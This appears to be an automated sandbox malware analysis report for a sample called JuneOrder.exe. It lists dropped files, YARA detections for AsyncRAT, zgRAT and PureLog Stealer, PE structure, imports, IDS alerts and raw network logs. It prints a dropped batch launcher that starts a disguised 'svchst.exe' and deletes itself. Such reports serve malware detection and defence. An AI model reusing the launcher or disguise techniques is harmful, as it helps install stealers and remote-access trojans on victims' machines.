                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, manufacturer=BeFunky, orientation=upper-left, xresolution=94, yresolution=102, resolutionunit=2, software=BeFunky Photo Editor], baseline, precision 8, 1319x1003, components 3
                                      Category:dropped
                                      Size (bytes):187448
                                      Entropy (8bit):7.978073132300376
                                      Encrypted:false
                                      SSDEEP:3072:PdnWNVoJEPuBCMl4fGFGQXTAi4PuptMWErNIjYnK/RMcZyx1hWHf6zf1:1nW7omPevKO1ETrN4McS1hwy9
                                      MD5:4F38547E1600BE2578340D8978D39AC8
                                      SHA1:B6ED4E313DF8EE534F30431BD1BFDC785B3AA290
                                      SHA-256:8B0DE00A83E7A8EED9D4DADE444602F859EA9DCE0D116D6D7120B370F1143E98
                                      SHA-512:ED64F5DA5E0421877EFB26FBDEFE9E843C29988530B57338DF05D5805810E90911184C2D77846CF5DA53255D247C722C654FD608A46D4127459D9CA4E6A1F7D5
                                      Malicious:false
                                      Preview:......Exif..MM.*.................V.......................^...........f.(...........1.........n....BeFunky....,.......,....BeFunky Photo Editor.....JFIF.....,.,......ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C.........................................................................'.."...........................................R...........................!......1QRST..A."2aq...#345Brs....$6Ut..7b..C%Dc...d...................................N..........................!1A...Q...."RSq...2Ua..#b....
                                      Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):152
                                      Entropy (8bit):5.046764993375051
                                      Encrypted:false
                                      SSDEEP:3:mKDDCMNqTtvL5oCHyg4EaKC5eAZmqRDCHyg4E2J5xAInTRIKUAIRVZPy:hWKqTtT6CHhJaZ5fZmq1CHhJ23fTrUze
                                      MD5:3C164C1944CEC69621F836739BD9984E
                                      SHA1:0DC681427FF5AD42377DBFEF917C50F47389C587
                                      SHA-256:AB229D218C42B207D3CD916A0F51A9B686FCA422ED9583F19A680D1CD818F4C6
                                      SHA-512:2EB82BE2B28B1FB0A87FDBBF5F5FDF9ABCF7E2EB5F62B8AE4DADEB13B63E5921CFA8563792FB5C14247C831FE93766CB464E7933FE64F373A84B667C4B6E3804
                                      Malicious:false
                                      Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchst.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpE1C4.tmp.bat" /f /q..
                                      Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      File Type:OpenPGP Secret Key
                                      Category:dropped
                                      Size (bytes):77280
                                      Entropy (8bit):7.99752184506873
                                      Encrypted:true
                                      SSDEEP:1536:O2HMFyMeCgPdAAK+A/5+QgBj2APzNBSjcTzfeXQs1TJ0o:THolgPd/KhQT2ABB0izfuQsRJ0o
                                      MD5:D9E7A4031669A2AC5AB65A4754F26069
                                      SHA1:064614C390DDE58F5B426AF88FEC2204A3A38B22
                                      SHA-256:670856FBD0D5D08AAEEB7B4E89534C546472CA3F7E1A5CDA847AB67D86A99A91
                                      SHA-512:83F6F073EB867CF98220AF30A8A0D94F60125F38E392D16852832CFDD8BD92484A9DC19FFFC3C16ADFDA4BFA50CDAA102AF5D552B7C52B2D8743E8DD5B8C6AAD
                                      Malicious:false
                                      Preview:...H.*...l......V......`.x.....y:.pW...4......l.oG.7..qWWG.R.....?A.[..1....I.g.n0.I....'QA(?...y4.d....F...i0O0.N.J.{7".E..........1...,...q.P..Jn... W&..w.....>.o..P..yJ.F..."O...".'t#.j$X B..s.B.FZ...N.T.9.....4.Z ..KW....-....[>....fc.....:.*^\...UI6...T.E...n..........Z...R...x'......rHL._n.I.......#..T.S1J@...e.".b..........>b].t.4*.....].4v.\.^n.Z]..o....d_h.u......-_...x...6.]^FQf.V.......g..g.Ib..%.?;3.:h..J.e*...i..........u.!......;E"B..C....*=..9$.J.7..fyDz...ty..#....Jjlw*,.^.....[..V.'as..F58gW....2[..'.....Qk<........a.c......p...........3.x%..9..?.#..kVO|...JO[.C".~>X.......O........a.l.R....d..K.:..<R......5J..#~Y..+\.;....p... 8..ll..tbI.H..ra....W$...#..p..-h.. q.D.un...6.?.j..A..ul........0..5..2...`'.oG.......6..N.P..D.8w.....QM#p=..r.....S...U......zk..Ut...G.....d.*o.fSS....1...g.SB..2...Y.9E.....L_I.A...t.....x.QM2H..6......@Ye@......j.P.4.q....\...w.E..myr.)..Y..Hj].......db....15......p.......e...._.R/.
                                      Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):77269
                                      Entropy (8bit):5.815436890850354
                                      Encrypted:false
                                      SSDEEP:1536:9MSYukzVT0Mq12kX/i3bWXSzWs3gjdix+cS7i9u6yeNejY6yFOB:0ukxT0MY2kPi3bWKWs3AQx+cS7DZW6ys
                                      MD5:834CFE4C91E1AA48057F85F67999ADC8
                                      SHA1:2803F3605AF8F9C1F34011060B1413792E57C258
                                      SHA-256:7E7039D296A5E761E4E8950966A05311D8B52055E31178EAA0B22E6AEC51D85F
                                      SHA-512:0FEF2021AC2E0ECED4914AD022438CAF116C2E93074FD36A498229094246BD29A320BA9D1B112F6994E7AB3A268E6A95371844BA78202AFD45752CE4FC0DCD1C
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, Author: ditekSHen
                                      Preview:......................................................R.U.."....pZ/._y..w....j..*..bR.{.....v.R......>..c ..}..~|@)....f.....(=.A...e_.3y..c...^UD..^Wo..........r6......G$j...`.....").....=n....|..yz...\.1..^y....AkD...S...Q.O$3....k.}.._..lI.!..p....;.>.G...hi%.w.M.......D..@. .}....Fp.`V:.....L...E.."r.D..<s.[..S.?>.f..|...0:....F...@..}wWP..&.....?.p....>T..&j..k5._.j..n:r.m.K..!..C.G....r...Q.5r..EI....`'.A>YF..R=C.._-Y.......i....77E6`Q/...CO.......s.G...)..j).N..D.......v....0.4..3.6._+.........&....&.@..r;`T....]L"].........................?...ole32;oleaut32;wininet;mscoree;shell32..............................................................................................................................................................................................................................................amsi....clr.wldp....ntdll......................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):402432
                                      Entropy (8bit):5.863361032556363
                                      Encrypted:false
                                      SSDEEP:6144:pviKqHZZ16CQRTzqPbtE7PgQM0n2d3LGcm7Yib:pLu1U6nQMY2d36cm7Y
                                      MD5:1B3E4783A56A59A811CBD437C6C34A18
                                      SHA1:1C3C098D76F93570C6F72A815EE1E257DA9E2A7F
                                      SHA-256:B92D49DB7714FCADCFA107DBC3A37A12FA30E4AADEBD1EB1D551CCFE61F638DE
                                      SHA-512:C7AB45B5376677CE3484B2D575304FE23A38EB1491245D899E57C6491C999704318D6F5BF5B2FA560692BF52C531C4445F999E95269A1443323FCCB73AC58E38
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\svchst.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      • Antivirus: Virustotal, Detection: 59%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............7... ...@....@.. ....................................`..................................7..K....@.......................`......g7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................7......H........I..Tu.............#v...6.......................................0..Q....... ........8........E....................a.......=...8....8.... ....8....~....9.... ....~....{....:....& ....8....8k... ....~....{....9....& ....8~.......~(...(S...~)...(W... ....<.... ....~....{....9H...& ....8=...r...ps....z*...... ....~....{....9....& ....8....~&...(K... .... .... ....s....~'...(O....... ....~....{....9....& ....8........0.......... ........8........E....)...9.......8...8$...
                                      Process:C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):77269
                                      Entropy (8bit):5.815436890850354
                                      Encrypted:false
                                      SSDEEP:1536:9MSYukzVT0Mq12kX/i3bWXSzWs3gjdix+cS7i9u6yeNejY6yFOB:0ukxT0MY2kPi3bWKWs3AQx+cS7DZW6ys
                                      MD5:834CFE4C91E1AA48057F85F67999ADC8
                                      SHA1:2803F3605AF8F9C1F34011060B1413792E57C258
                                      SHA-256:7E7039D296A5E761E4E8950966A05311D8B52055E31178EAA0B22E6AEC51D85F
                                      SHA-512:0FEF2021AC2E0ECED4914AD022438CAF116C2E93074FD36A498229094246BD29A320BA9D1B112F6994E7AB3A268E6A95371844BA78202AFD45752CE4FC0DCD1C
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: unknown
                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, Author: ditekSHen
                                      Preview:......................................................R.U.."....pZ/._y..w....j..*..bR.{.....v.R......>..c ..}..~|@)....f.....(=.A...e_.3y..c...^UD..^Wo..........r6......G$j...`.....").....=n....|..yz...\.1..^y....AkD...S...Q.O$3....k.}.._..lI.!..p....;.>.G...hi%.w.M.......D..@. .}....Fp.`V:.....L...E.."r.D..<s.[..S.?>.f..|...0:....F...@..}wWP..&.....?.p....>T..&j..k5._.j..n:r.m.K..!..C.G....r...Q.5r..EI....`'.A>YF..R=C.._-Y.......i....77E6`Q/...CO.......s.G...)..j).N..D.......v....0.4..3.6._+.........&....&.@..r;`T....]L"].........................?...ole32;oleaut32;wininet;mscoree;shell32..............................................................................................................................................................................................................................................amsi....clr.wldp....ntdll......................................................................................................................
                                      Process:C:\Windows\SysWOW64\timeout.exe
                                      File Type:ASCII text, with CRLF line terminators, with overstriking
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.41440934524794
                                      Encrypted:false
                                      SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                      MD5:3DD7DD37C304E70A7316FE43B69F421F
                                      SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                      SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                      SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                      Malicious:false
                                      Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.344287937833165
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • VXD Driver (31/22) 0.00%
                                      File name:JuneOrder.exe
                                      File size:522'240 bytes
                                      MD5:2b19d65705eee546214513fb65948b2a
                                      SHA1:20b6c01b9f20047fc9f3bf9baa14b5046cbc0012
                                      SHA256:106dc2ab6da5448b983e66c7c6850533006abf9176eb6ee3d58e101b83d8d47f
                                      SHA512:183bb9331b20d2f4118820bd372e5202220e29cfea2d5ae5fedd8d1a9bfaf548a9399aa604950553948899a1d75658e64480c660ce7f83bb89cd566e1385eb72
                                      SSDEEP:6144:+ldk1cWQRNTB2/Me7eC9g1HGnKBvYfew0PjZmwvhhlJdZBuUwXtgZcJeJ:+cv0NTg/XrRnKBwfOM0dayZKeJ
                                      TLSH:CBB40A57340C26EAFE6EB576509E0D4B9BB020379F52602F3299F56205C62474B3BEBC
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....................0....@..........................@.............................................
                                      Icon Hash:c6c9808283998183
                                      Entrypoint:0x401000
                                      Entrypoint Section:.code
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:
                                      Time Stamp:0x5D400562 [Tue Jul 30 08:52:50 2019 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:5877688b4859ffd051f6be3b8e0cd533
                                      Instruction
                                      push 000000ACh
                                      push 00000000h
                                      push 00418010h
                                      call 00007F6AD480D2D1h
                                      add esp, 0Ch
                                      push 00000000h
                                      call 00007F6AD480D2CAh
                                      mov dword ptr [00418014h], eax
                                      push 00000000h
                                      push 00001000h
                                      push 00000000h
                                      call 00007F6AD480D2B7h
                                      mov dword ptr [00418010h], eax
                                      call 00007F6AD480D231h
                                      mov eax, 00417088h
                                      mov dword ptr [00418034h], eax
                                      call 00007F6AD4816052h
                                      call 00007F6AD4815DBEh
                                      call 00007F6AD4812CB8h
                                      call 00007F6AD481253Ch
                                      call 00007F6AD4811FCFh
                                      call 00007F6AD4811D49h
                                      call 00007F6AD481186Dh
                                      call 00007F6AD4810FEDh
                                      call 00007F6AD480D5B5h
                                      call 00007F6AD4814938h
                                      call 00007F6AD48133E0h
                                      mov edx, 0041702Eh
                                      lea ecx, dword ptr [0041801Ch]
                                      call 00007F6AD480D248h
                                      push FFFFFFF5h
                                      call 00007F6AD480D258h
                                      mov dword ptr [0041803Ch], eax
                                      mov eax, 00000200h
                                      push eax
                                      lea eax, dword ptr [004180B8h]
                                      push eax
                                      xor eax, eax
                                      push eax
                                      push 00000015h
                                      push 00000004h
                                      call 00007F6AD4811F92h
                                      push dword ptr [004180A0h]
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1717c0xc8.data
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x6a068.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x174700x22c.data
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .code0x10000x37f00x38006c0f4094a5493360ae8c9032ef3a9f47False0.47140066964285715data5.608776130769213IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .text0x50000xd2c20xd4001da643e4b1937b50550f9d9e8250428eFalse0.5114239386792453data6.558083729279072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x130000x339d0x34004fb07923b0eb72c40319d48fd2d4f13fFalse0.8046123798076923data7.110640338733979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x170000x172c0x1200b2a1dd39bbccebca3428438db1561a06False0.3938802083333333data4.996392625779126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x190000x6a0680x6a2004f075409f39726f574ce4f593521fc06False0.44237706124852766data5.918663736370753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x1942c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.6959219858156028
                                      RT_ICON0x198940x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m0.6524590163934426
                                      RT_ICON0x1a21c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.6254690431519699
                                      RT_ICON0x1b2c40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.5818464730290457
                                      RT_ICON0x1d86c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.5620571563533302
                                      RT_ICON0x21a940x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.5382162661737523
                                      RT_ICON0x26f1c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.524595333193189
                                      RT_ICON0x303c40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.4944398438424228
                                      RT_ICON0x40bec0x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 3779 x 3779 px/m0.4027687368701364
                                      RT_RCDATA0x82c140x1very short file (no magic)9.0
                                      RT_RCDATA0x82c180xezlib compressed data1.5714285714285714
                                      RT_RCDATA0x82c280x13fdata1.0344827586206897
                                      RT_RCDATA0x82d680x15data1.380952380952381
                                      RT_GROUP_ICON0x82d800x84data0.7121212121212122
                                      RT_MANIFEST0x82e040x263XML 1.0 document, ASCII text0.5319148936170213
                                      DLLImport
                                      MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                      KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                      USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                      GDI32.DLLGetStockObject
                                      COMCTL32.DLLInitCommonControlsEx
                                      SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                      WINMM.DLLtimeBeginPeriod
                                      OLE32.DLLCoInitialize, CoTaskMemFree
                                      SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                      2024-07-30T11:11:44.820859+0200TCP2035607ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)770749717192.228.105.2192.168.2.8
                                      2024-07-30T11:12:19.488269+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971813.85.23.86192.168.2.8
                                      2024-07-30T11:11:41.311766+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971013.85.23.86192.168.2.8
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 30, 2024 11:11:24.066874981 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.066984892 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.067086935 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.078541040 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.078573942 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.586508036 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.586613894 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.595495939 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.595545053 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.595830917 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.610860109 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.652508020 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806103945 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806204081 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806286097 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.806368113 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806459904 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806525946 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.806541920 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806941986 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806983948 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.806989908 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.807004929 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.807060957 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.807462931 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.811093092 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.811141014 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.811151981 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.811167002 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.811222076 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.811235905 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.811435938 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.811490059 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.811502934 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.852531910 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.899293900 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.899395943 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.899427891 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.899447918 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.899472952 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.899509907 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.899513006 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.899522066 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.899569988 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.900043011 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.900110006 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.900144100 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.900149107 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.900156021 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.900194883 CEST49707443192.168.2.834.117.33.233
                                      Jul 30, 2024 11:11:24.900202036 CEST4434970734.117.33.233192.168.2.8
                                      Jul 30, 2024 11:11:24.900840044 CEST4434970734.117.33.233192.168.2.8
